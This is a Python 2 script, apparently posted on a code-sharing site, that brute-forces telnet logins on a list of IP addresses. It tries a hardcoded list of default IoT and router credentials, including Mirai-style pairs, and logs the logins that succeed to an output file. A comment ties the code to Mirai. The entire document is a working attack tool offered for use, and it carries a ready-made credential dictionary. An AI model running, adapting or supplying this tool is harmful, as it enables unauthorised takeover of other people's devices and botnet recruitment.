[ PYTHON ] Telnet Bruter/Device Exploiter

1. //Telnet Bruter
2. import threading
3. import sys, os, re, time, socket
4. from Queue import *
5. from sys import stdout
6.  
7. if len(sys.argv) < 4:
8.     print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
9.     sys.exit()
10.  
11. combo = [
12.   "root:xc3511",
13.     "root:vizxv",
14.     "root:admin",
15.     "admin:admin",
16.     "root:888888",
17.     "root:xmhdipc",
18.     "root:default",
19.     "root:juantech",
20.     "root:123456",
21.     "root:54321",
22.     "support:support",
23.     "root:",
24.     "admin:password",
25.     "root:root",
26.     "root:12345",
27.     "user:user",
28.     "admin:",
29.     "root:pass",
30.     "admin:admin1234",
31.     "root:1111",
32.     "admin:smcadmin",
33.     "admin:1111",
34.     "root:666666",
35.     "root:password",
36.     "root:1234",
37.     "root:klv123",
38.     "Administrator:admin",
39.     "service:service",
40.     "supervisor:supervisor",
41.     "guest:guest",
42.     "guest:12345",
43.     "admin1:password",
44.     "administrator:1234",
45.     "666666:666666",
46.     "888888:888888",
47.     "ubnt:ubnt",
48.     "root:klv1234",
49.     "root:Zte521",
50.     "root:hi3518",
51.     "root:jvbzd",
52.     "root:anko",
53.     "root:zlxx.",
54.     "root:7ujMko0vizxv",
55.     "root:7ujMko0admin",
56.     "root:system",
57.     "root:ikwb",
58.     "root:dreambox",
59.     "root:user",
60.     "root:realtek",
61.     "root:00000000",
62.     "admin:1111111",
63.     "admin:1234",
64.     "admin:12345",
65.     "admin:54321",
66.     "admin:123456",
67.     "admin:7ujMko0admin",
68.     "admin:pass",
69.     "admin:meinsm",
70.     "tech:tech",
71.     "mother:fucker",
72.     "default:",
73.     "admin:ADMIN",
74.     "root:1234567",
75.     "supervisor:zyad1234",
76.     "daemon:",
77.     "adm:",
78.     "default:default",
79.     "root:696969",
80.     "Alphanetworks:wrgg19_c_dlwbr_dir300",
81.     "Alphanetworks:wrgn49_dlob_dir600b",
82.     "Alphanetworks:wrgn23_dlwbr_dir600b",
83.     "Alphanetworks:wrgn22_dlwbr_dir615",
84.     "Alphanetworks:wrgnd08_dlob_dir815",
85.     "Alphanetworks:wrgg15_di524",
86.     "Alphanetworks:wrgn39_dlob.hans_dir645",
87.     "Alphanetworks:wapnd03cm_dkbs_dap2555",
88.     "Alphanetworks:wapnd04cm_dkbs_dap3525",
89.     "Alphanetworks:wapnd15_dlob_dap1522b",
90.     "Alphanetworks:wrgac01_dlob.hans_dir865",
91.     "Alphanetworks:wrgn23_dlwbr_dir300b",
92.     "Alphanetworks:wrgn28_dlob_dir412",
93.     "Alphanetworks:wrgn39_dlob.hans_dir645_V1"
94. ]
95.  
96. ips = open(sys.argv[1], "r").readlines()
97. threads = int(sys.argv[2])
98. output_file = sys.argv[3]
99. queue = Queue()
100. queue_count = 0
101.  
102. for ip in ips:
103.     queue_count += 1
104.     stdout.write("\r[%d] Added to queue" % queue_count)
105.     stdout.flush()
106.     queue.put(ip)
107. print "\n"
108.  
109.  
110. class router(threading.Thread):
111.     def __init__ (self, ip):
112.         threading.Thread.__init__(self)
113.         self.ip = str(ip).rstrip('\n')
114.     def run(self):
115.         username = ""
116.         password = ""
117.         for passwd in combo:
118.             if ":n/a" in passwd:
119.                 password=""
120.             else:
121.                 password=passwd.split(":")[1]
122.             if "n/a:" in passwd:
123.                 username=""
124.             else:
125.                 username=passwd.split(":")[0]
126.             try:
127.                 tn = socket.socket()
128.                 tn.settimeout(8)
129.                 tn.connect((self.ip,23))
130.             except Exception:
131.                 tn.close()
132.                 break
133.             try:
134.                 hoho = ''
135.                 hoho += readUntil(tn, "ogin:")
136.                 if "ogin" in hoho:
137.                     tn.send(username + "\n")
138.                     time.sleep(0.09)
139.             except Exception:
140.                 tn.close()
141.             try:
142.                 hoho = ''
143.                 hoho += readUntil(tn, "assword:")
144.                 if "assword" in hoho:
145.                     tn.send(password + "\n")
146.                     time.sleep(0.8)
147.                 else:
148.                     pass
149.             except Exception:
150.                 tn.close()
151.             try:
152.                 prompt = ''
153.                 prompt += tn.recv(40960)
154.                 if ">" in prompt and "ONT" not in prompt:
155.                     success = True
156.                 elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
157.                     success = True             
158.                 else:
159.                     tn.close()
160.                 if success == True:
161.                     try:
162.                         os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
163.                         print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
164.                         tn.close()
165.                         break
166.                     except:
167.                         tn.close()
168.                 else:
169.                     tn.close()
170.             except Exception:
171.                 tn.close()
172.  
173. def readUntil(tn, string, timeout=8):
174.     buf = ''
175.     start_time = time.time()
176.     while time.time() - start_time < timeout:
177.         buf += tn.recv(1024)
178.         time.sleep(0.01)
179.         if string in buf: return buf
180.     raise Exception('TIMEOUT!')
181.  
182. def worker():
183.     try:
184.         while True:
185.             try:
186.                 IP = queue.get()
187.                 thread = router(IP)
188.                 thread.start()
189.                 queue.task_done()
190.                 time.sleep(0.02)
191.             except:
192.                 pass
193.     except:
194.         pass
195.  
196. for l in xrange(threads):
197.     try:
198.         t = threading.Thread(target=worker)
199.         t.start()
200.     except:
201.         pass